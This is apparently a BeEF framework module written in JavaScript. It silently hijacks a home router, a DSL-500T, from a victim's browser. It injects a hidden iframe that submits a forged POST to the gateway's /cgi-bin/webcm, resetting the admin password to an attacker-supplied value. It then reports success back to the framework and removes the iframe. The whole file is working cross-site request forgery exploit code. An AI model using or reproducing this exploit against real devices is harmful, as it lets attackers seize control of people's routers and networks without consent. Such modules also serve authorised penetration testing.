//
//   Copyright 2012 Wade Alcorn wade@bindshell.net
//
//   Licensed under the Apache License, Version 2.0 (the "License");
//   you may not use this file except in compliance with the License.
//   You may obtain a copy of the License at
//
//       http://www.apache.org/licenses/LICENSE-2.0
//
//   Unless required by applicable law or agreed to in writing, software
//   distributed under the License is distributed on an "AS IS" BASIS,
//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//   See the License for the specific language governing permissions and
//   limitations under the License.
//
beef.execute(function() {
  var gateway = '<%= @base %>'; 
  var passwd = '<%= @password %>';

  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
      [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
       {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
       {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
       {'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},
       {'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}
      ]);

  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

  cleanup = function() {
    document.body.removeChild(dsl500t_iframe);
  }
  setTimeout("cleanup()", 15000);

});